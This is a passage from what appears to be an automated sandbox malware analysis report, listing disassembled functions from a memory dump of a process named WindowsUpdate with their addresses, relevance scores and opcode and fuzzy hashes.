    • Instruction Fuzzy Hash: 10C1AF31114A4D8FEB99DF1CC48ABA577F0FBAA314F558499E859DB2E1C335D852CB00
    Function 00000217700DE6F8 Relevance: 1.5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: 0
    • API String ID: 3215553584-4108050209
    • Opcode ID: cfd14bc4126215dd6b17d6b904430df3e97191f6032318430beb662dcd74d319
    • Instruction ID: bef567fbe601eb4d7e3dd77c39dd4fe743933795749674af2dbbca90c771605c
    • Opcode Fuzzy Hash: cfd14bc4126215dd6b17d6b904430df3e97191f6032318430beb662dcd74d319
    • Instruction Fuzzy Hash: 0681B93021C6C54AFBAEAA18849D3E9F7E1EBE732CF24155DD449C72C3CA10C867D662
    Function 00000217700B59D0 Relevance: 1.0, Instructions: 960COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fd3d377db4ee0e36e1021f135c1832d73f1b94c5c0fddee8f192b3a34a77baf9
    • Instruction ID: 5a1eca24f96510aa1ba8531ec7426c50f92094130424a66fcd7fa7bcb74f6efc
    • Opcode Fuzzy Hash: fd3d377db4ee0e36e1021f135c1832d73f1b94c5c0fddee8f192b3a34a77baf9
    • Instruction Fuzzy Hash: 6352D87062C3A44BD32D8E2A589113ABBE5E7CB307F04827EE9D7D7683C93454079B99
    Function 00000217700C7CC0 Relevance: .8, Instructions: 829COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5c698153fd8d3b07954fe4b2c4fb2412659150fa673a53b712d63bdd8769bf65
    • Instruction ID: 822f0f23f41aaa74399711869f96514aab8e89347900ef3b0fe6a9466939d170
    • Opcode Fuzzy Hash: 5c698153fd8d3b07954fe4b2c4fb2412659150fa673a53b712d63bdd8769bf65
    • Instruction Fuzzy Hash: 9722F0356249064BE35CDA38CACF6A273E0F7693457641279DCCBC7686E920D4E3CAC6
    Function 00000217700B6570 Relevance: .7, Instructions: 696COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 45aa55cddd529bacec51f2f453c6186f03824f063f435d0257531b2cda0afce3
    • Instruction ID: 48fda8c8c3f805e6f7678a5e79bac292a4d0a61cae5740392e1e4bf481dbe1c4
    • Opcode Fuzzy Hash: 45aa55cddd529bacec51f2f453c6186f03824f063f435d0257531b2cda0afce3
    • Instruction Fuzzy Hash: 1E22077090C6A48BC71D8E5E9892474B7E1FB85309B15836DE9DBD7583CA3C6823DBE0
    Function 00000217700B6C50 Relevance: .7, Instructions: 680COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c9f83316896254c9c14ff747b585c2f32f23a182ec8a7e03346608f3dbd1bd08
    • Instruction ID: 78734cf2f0919e7fb67a3192f847eb72fee69666f567a913b1c90ec380718632
    • Opcode Fuzzy Hash: c9f83316896254c9c14ff747b585c2f32f23a182ec8a7e03346608f3dbd1bd08
    • Instruction Fuzzy Hash: D622573150C5A54BD70D8E1EA892074B7E2FB8530A71492BEEDD797683C93CA423DBE0
    Function 00000217700D69C0 Relevance: .7, Instructions: 672COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 971f15471437d8ad3083ae0bb5d5feac1a7ff2488c6f59d32790ac4fd9e5387a
    • Instruction ID: 8c491c232c7d29f8fb5208947774faa785faa7d14f243b440526bfbd76952329
    • Opcode Fuzzy Hash: 971f15471437d8ad3083ae0bb5d5feac1a7ff2488c6f59d32790ac4fd9e5387a
    • Instruction Fuzzy Hash: 4902C32032CD5947F71C962D9889921B3C2F7E4309B6083AEF896D76E3DC34E4A6D295
    Function 00000217700D47E0 Relevance: .7, Instructions: 661COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 78a1653a917feb94fdfcf1961e5bd8166bca02a8f5a86504f8464925216df68c
    • Instruction ID: e2d12b239f6051b8bb0646bfd9331c2145c3d1ad6c7ba1672d441d7bb27232f2
    • Opcode Fuzzy Hash: 78a1653a917feb94fdfcf1961e5bd8166bca02a8f5a86504f8464925216df68c
    • Instruction Fuzzy Hash: FB1294312249050BC31ECD389CA5177B3D1F7C830E7699A6DE9C3D7986DD38A8639B85
    Function 00000217700BE350 Relevance: .5, Instructions: 530COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6cf422fea4e083ce0483a5c69a5b82fdc7b8d43ce8b7062314ebca9ab462ba9c
    • Instruction ID: 57c53c5f74acecc5bdce3b75a48dcbee3099fc18401dbe958d645a09e2981cbc
    • Opcode Fuzzy Hash: 6cf422fea4e083ce0483a5c69a5b82fdc7b8d43ce8b7062314ebca9ab462ba9c
    • Instruction Fuzzy Hash: B1F1A53052CE4D4AEB6AAB589C587EAF3F1FBF7368F040229D406D71D1DA70D842C681
    Function 00000217700D76D0 Relevance: .5, Instructions: 504COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 120508a974eec2239ea787ca40a1081c0a92d259c30b287eae7a6934806f566f
    • Instruction ID: a7eeafc5e9890b8248e2663c20a14762260a7c09340d2e6e5b911697b8d50b53
    • Opcode Fuzzy Hash: 120508a974eec2239ea787ca40a1081c0a92d259c30b287eae7a6934806f566f
    • Instruction Fuzzy Hash: 4BE10430614A044FD329DE1DE9C8661B3E1FB8930EF24827DD9CAC7287DA35E4578AD5
    Function 00000217700DAA44 Relevance: .5, Instructions: 503COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6541c96e8e0885c1fb6b6403957449a9a04c8d314077148ca5805578a927d4c5
    • Instruction ID: 07e4ef3cc621a62232dbd4444c90a7c6201c08a4c092a2adce67d2ad74ea483d
    • Opcode Fuzzy Hash: 6541c96e8e0885c1fb6b6403957449a9a04c8d314077148ca5805578a927d4c5
    • Instruction Fuzzy Hash: D6E10430614A044FD329DE1DE9C8661B3E1FB8930DF24827DD9CAC7287DA39E4578AD5
    Function 00000217700C77A0 Relevance: .5, Instructions: 485COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: dd01f6c7e838bd7b7996199fedc7117c25cf5638f24122168e22016455e241a3
    • Instruction ID: 7d72833529e51b2561f7a7359493c138d3f85b4bc8021b782bfc37c0c4b091ed
    • Opcode Fuzzy Hash: dd01f6c7e838bd7b7996199fedc7117c25cf5638f24122168e22016455e241a3
    • Instruction Fuzzy Hash: E9D1E330624A094BE74DDE38C9CE6A273E0F7A9355760426DDCCBC7696DA30D493C6C5
    Function 00000217700D4E70 Relevance: .5, Instructions: 481COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 79fa3d8491be301e8f17d7e1e015c785c77767cabc404a44b6b6a423bf5eb159
    • Instruction ID: d55e3da6c41cfb96cc364c2943c55d8b61da2a156cfb5747e2c9685b489868e3
    • Opcode Fuzzy Hash: 79fa3d8491be301e8f17d7e1e015c785c77767cabc404a44b6b6a423bf5eb159
    • Instruction Fuzzy Hash: 79C13E3677484507E74D842CEC673B922D3E7D530EB28D23CEA97D66C6D86C89538A44
    Function 00000217700B52D0 Relevance: .4, Instructions: 449COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: bd979db52178002ccb5b82c099e33db150f3668ce11a2263a480204cac049ffb
    • Instruction ID: aba2b44ce6545c6217f65210b2e39361ebdab45bf16fccaaadaea29586868f7c
    • Opcode Fuzzy Hash: bd979db52178002ccb5b82c099e33db150f3668ce11a2263a480204cac049ffb
    • Instruction Fuzzy Hash: 06E1F631A0CE4C4BEB26AB6899497EDF7B1FBB6311F50479AD442D31C6EE209946C7C0
    Function 00000217700B9500 Relevance: .4, Instructions: 425COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: db9e5d6d5b6cd3e5ed5117f1183f8c2e9152f7bcf2b339abb80a4dc2c9a15466
    • Instruction ID: e2cd978da60b05b9fedafae0661b9b54f04c5793b2d65c5287e283986ed330ba
    • Opcode Fuzzy Hash: db9e5d6d5b6cd3e5ed5117f1183f8c2e9152f7bcf2b339abb80a4dc2c9a15466
    • Instruction Fuzzy Hash: 62C14D7156CF890BD71AA6289C4A3B9F3E0F7D7315F54172EE9CAC31C2EA25C4538682
    Function 00000217700D7A20 Relevance: .4, Instructions: 407COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d48b6acafc2b7e77bbaa3fcdd0f83935027b9bb90542e2d9777655524157c5dc
    • Instruction ID: e22f5363335d2af1ed37897c2863da0144b8beb3509d275214d8634c7a73cadc
    • Opcode Fuzzy Hash: d48b6acafc2b7e77bbaa3fcdd0f83935027b9bb90542e2d9777655524157c5dc
    • Instruction Fuzzy Hash: FFA1043176CE580B975CAA6C9C8B17177C4E7DD212B04827FFC89C32A2E924D99387C6
    Function 00000217700BA090 Relevance: .4, Instructions: 377COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 62ea63dc45793a91f35addbd86c675086eaeb1489714cc4cf96ecd6a9d554ec0
    • Instruction ID: c280a083edb256e120971fad3ea934cc6e33bb65dca0a39395b3b8f6799efd56
    • Opcode Fuzzy Hash: 62ea63dc45793a91f35addbd86c675086eaeb1489714cc4cf96ecd6a9d554ec0
    • Instruction Fuzzy Hash: ECB11B3051CF484BEB67AA2898497E6F3E1EFE7310F50072EE486D31D2EB64D586C685
    Function 00000217700CB1E0 Relevance: .4, Instructions: 374COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d20e6e6e1e3f0f7b6a3f41f3c005f27ca2412777a6d734776a30905dd6d01120
    • Instruction ID: 98b1249b713fa6fba1852999f6e1c676ec1638559bd0e673d52f42d67766cdd2
    • Opcode Fuzzy Hash: d20e6e6e1e3f0f7b6a3f41f3c005f27ca2412777a6d734776a30905dd6d01120
    • Instruction Fuzzy Hash: B3D15F20119ACA9FDB45CF6C84C49957FB0FB7A241B4842DAEC88CF687C224D6E5C7E1
    Function 00000217700D8200 Relevance: .3, Instructions: 326COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 16bcd64f8ccda112741447d0564fe755dfd273f25f0f336a09b67f2b3cc2ada2
    • Instruction ID: b566b26afd88a6ade39b6aa371ae819e085a4ec6759a95f07bd22a8df4f2785d
    • Opcode Fuzzy Hash: 16bcd64f8ccda112741447d0564fe755dfd273f25f0f336a09b67f2b3cc2ada2
    • Instruction Fuzzy Hash: 8291382061C6E50E930D466E18A9031BFD0EB9A307329C2BEF9DFD7593C8289413DBE5
    Function 00000217700B4B50 Relevance: .3, Instructions: 293COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2acc2b19f55320736815efa034f58209f5246b8a49aac5063f6cafa8d7fafdae
    • Instruction ID: 30109c754541bdfe6d601b3dce0bc277c4b319ecd9b22d126cedb8f0af165ae6
    • Opcode Fuzzy Hash: 2acc2b19f55320736815efa034f58209f5246b8a49aac5063f6cafa8d7fafdae
    • Instruction Fuzzy Hash: B49165316186458FD70CEE2CD8566F5B3D2F7CA309F14863ED9CBC7682EA3895068B41
    Function 00000217700D5FB0 Relevance: .3, Instructions: 268COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fa69c09274c5eae73456c7e50fb70b7679c7c2ff16848e9009f6ee66f8f23c8a
    • Instruction ID: e7abea0c7116ce6815be1a3cc41ade13f91c76c924f25bf859002fb63e24adfb
    • Opcode Fuzzy Hash: fa69c09274c5eae73456c7e50fb70b7679c7c2ff16848e9009f6ee66f8f23c8a
    • Instruction Fuzzy Hash: 8C7160B1A587018BD70CCE18D8824A1B3E5FB89315B24D16DE987CB207EA34E457CE89
    Function 00000217700D6360 Relevance: .3, Instructions: 261COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c236e7935cfbc988d5430de56f90fa4ea90af69f7556ffc36c01ab66d8ae1d23
    • Instruction ID: eacb6446bdf5979e4ba6a0872e399316a6a456744fc9f3cf10eeee52e0c6cce3
    • Opcode Fuzzy Hash: c236e7935cfbc988d5430de56f90fa4ea90af69f7556ffc36c01ab66d8ae1d23
    • Instruction Fuzzy Hash: 2381FC3050CF984FDB65EF2884986B1FBE0FBA9310F0546AED8C9C7166DA20E559C791
    Function 00000217700B5700 Relevance: .3, Instructions: 253COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d7c94ceaaa6107eb7ed1b8c69fdcef2e1a69fe3788fd59d5c1df14236273b7ef
    • Instruction ID: 21bcc26ba5081e161017fcf533631005f3f154270c1e80147d4f80a9a1734d83
    • Opcode Fuzzy Hash: d7c94ceaaa6107eb7ed1b8c69fdcef2e1a69fe3788fd59d5c1df14236273b7ef
    • Instruction Fuzzy Hash: 5081C934408684CBD719CF1DD8C49A1B7E1FB99309B1482ADE8CACB25BE939D817CB54
    Function 00000217700D5CF0 Relevance: .2, Instructions: 249COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d2002ceb009d2c9912de999474934e43360d1609713566e6ebb985138cc3b10e
    • Instruction ID: f710734c2e2e8c5a38e0fccc83b6d2d2d535203f16e0b7cdcf0f661fb37f7844
    • Opcode Fuzzy Hash: d2002ceb009d2c9912de999474934e43360d1609713566e6ebb985138cc3b10e
    • Instruction Fuzzy Hash: C6A12021619BC98FD72ECB6C88504EEBFB0EF76100B844A9DD8C6E7B43C614E559C7A1
    Function 00000217700D76B0 Relevance: .2, Instructions: 238COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: f1d4cf58abea7b864a4c7bfef70077653e8331d6fc89da353f5b905743404ccb
    • Instruction ID: 9623a6b76a83f50a04d6aba70a6bbca13030793eb4f6248e682b437e53dd5807
    • Opcode Fuzzy Hash: f1d4cf58abea7b864a4c7bfef70077653e8331d6fc89da353f5b905743404ccb
    • Instruction Fuzzy Hash: 4261083012CB994BD72E9A1C5845131FBE0FBAA315F1843ADE9D6C7283D924D453CBE6
    Function 00000217700D76C0 Relevance: .2, Instructions: 224COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c26edc6e1c1501269fac7a9931112e239372f56631b3b5b85cd6935b26a4d4c5
    • Instruction ID: df117e9cbf372e21476e4db51b7b19058ab0605975bbd9d90dc8172ececff24a
    • Opcode Fuzzy Hash: c26edc6e1c1501269fac7a9931112e239372f56631b3b5b85cd6935b26a4d4c5
    • Instruction Fuzzy Hash: E261E43011CB844BD71DDA1D9895525BBE1FBEA305F18869DE8CAC7287CA34E453CBD2
    Function 00000217700D2B80 Relevance: .2, Instructions: 211COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 52d3815f50e61f49ffa5fa51aad85644de4487aa5561d52189a1985097998492
    • Instruction ID: 932130957bdc2ddbbb455850942d4165c527174b52ff66fbc5ebf50ee0f2261f
    • Opcode Fuzzy Hash: 52d3815f50e61f49ffa5fa51aad85644de4487aa5561d52189a1985097998492
    • Instruction Fuzzy Hash: EC51C43152CB5C0AE72A9E78D44D3B9B7E1E7F7320F50125AE896C21D2DA61CC63C2A5
    Function 00000217700D76A0 Relevance: .2, Instructions: 190COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 88d074c3de29e84f1399f39f51d235bb337769b72126f3afee03f2878cb5b881
    • Instruction ID: 3872336dc99c505d132e9ec8aa130181ff61a976c9a2f8b9556f3c7c7b2df401
    • Opcode Fuzzy Hash: 88d074c3de29e84f1399f39f51d235bb337769b72126f3afee03f2878cb5b881
    • Instruction Fuzzy Hash: 3451E53000CFC54ED72A9B2994051B6FFF1EFAB310B19869EE0EA83683D614E526C756
    Function 00000217700D09A0 Relevance: .2, Instructions: 188COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 7021a1ba1e946de7c3e737bda4b3a77a3b71eb13e3c51145655dbeddf1e0d643
    • Instruction ID: b1b01bfb256ceb995701ff3d38e2a311322280b0ff1b1966b039d29bab975260
    • Opcode Fuzzy Hash: 7021a1ba1e946de7c3e737bda4b3a77a3b71eb13e3c51145655dbeddf1e0d643
    • Instruction Fuzzy Hash: A0714C601197C48EDB1ADF7D44841A67FF09B7A10170886DEECD9CA787C118D689C7B2
    Function 00000217700B63F0 Relevance: .2, Instructions: 187COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b79b6de12b2ada6463a758a0ef57e180fb4e656660e6a01602a7aa979e1cecc3
    • Instruction ID: 1115401bb1accf1e3b6e55bf509bdaa290b357836f32ffac756c5d6f86d2bcca
    • Opcode Fuzzy Hash: b79b6de12b2ada6463a758a0ef57e180fb4e656660e6a01602a7aa979e1cecc3
    • Instruction Fuzzy Hash: 4F41300022DCDA0DA70D822D1915530FFD0EAA928332C83AEF9DAE95C3D818C6D6C7E5
    Function 00000217700CF820 Relevance: .2, Instructions: 159COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 691ce1331103515b13d51ba9b323e388758da5798b353a293cdefc6482322abb
    • Instruction ID: 8f2af0e120e00d0eb5f07db0030a951e204f654a2277bb92da57454160f3422c
    • Opcode Fuzzy Hash: 691ce1331103515b13d51ba9b323e388758da5798b353a293cdefc6482322abb
    • Instruction Fuzzy Hash: 36517E202197C48EDB5ADF7D44841A67FF0DB7A101B0885DEECDACB387D518D64ACB62
    Function 00000217700D3370 Relevance: .2, Instructions: 157COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1edda47dbb9b15c5529a0a48df41674724a0e25f6d3adac6584d1c474ed8b8c7
    • Instruction ID: ae6015c1f01552389ef5f59c674b6d5a03347024b931ea8e2b0ef5327164f7b4
    • Opcode Fuzzy Hash: 1edda47dbb9b15c5529a0a48df41674724a0e25f6d3adac6584d1c474ed8b8c7
    • Instruction Fuzzy Hash: B351C03000DBC54ECB169B7994551B2FFF0EF6B321F19868EE4E986683C218E655C7A2
    Function 00000217700D4660 Relevance: .2, Instructions: 157COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1edda47dbb9b15c5529a0a48df41674724a0e25f6d3adac6584d1c474ed8b8c7
    • Instruction ID: 0d28e52fd21bd6dc451f03c32db621867ff9eda72044ef832e841a20b3b7b8e4
    • Opcode Fuzzy Hash: 1edda47dbb9b15c5529a0a48df41674724a0e25f6d3adac6584d1c474ed8b8c7
    • Instruction Fuzzy Hash: 9151E03000CBD54ECB168B7894451B2FFF0EF6B321F1A86CEE4E986683C214E555C7A2
    Function 00000217700DA8B0 Relevance: .2, Instructions: 157COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 83d9af8c6790764a277605a1e75cadf3f66b07bc3ca2a90717df41e73ee19f6e
    • Instruction ID: f265a6f92d200d1e28655c18e93ed2ec07afae9ed6046b161b202c2c956f1b04
    • Opcode Fuzzy Hash: 83d9af8c6790764a277605a1e75cadf3f66b07bc3ca2a90717df41e73ee19f6e
    • Instruction Fuzzy Hash: 2F41E9302285958FC71DCF1C98D1535BBE1EBDA306B09C1ADEDC6CB287C928D526CBA1
    Function 00000217700C09A0 Relevance: .1, Instructions: 140COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2930997552.00000217700A0000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000217700A0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_217700a0000_WindowsUpdate.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e3025b074cf35e683014a30d1578ce1f8d5047f760644139d91856bf05c0127a
    • Instruction ID: 1c54cf60523289a510f9ff6e19d41ec902cad63163c430370762e76bbc6d7c8b
    • Opcode Fuzzy Hash: e3025b074cf35e683014a30d1578ce1f8d5047f760644139d91856bf05c0127a
    • Instruction Fuzzy Hash: C731C131328E494BDF4CDE2CC85A67933D2F7A8309B14567EE847C72E6DA34D8428B85
    Function 00000217700D7D40 Relevance: .1, Instructions: 103COMMON
    Download Yara Rule
    Memory Dump Source
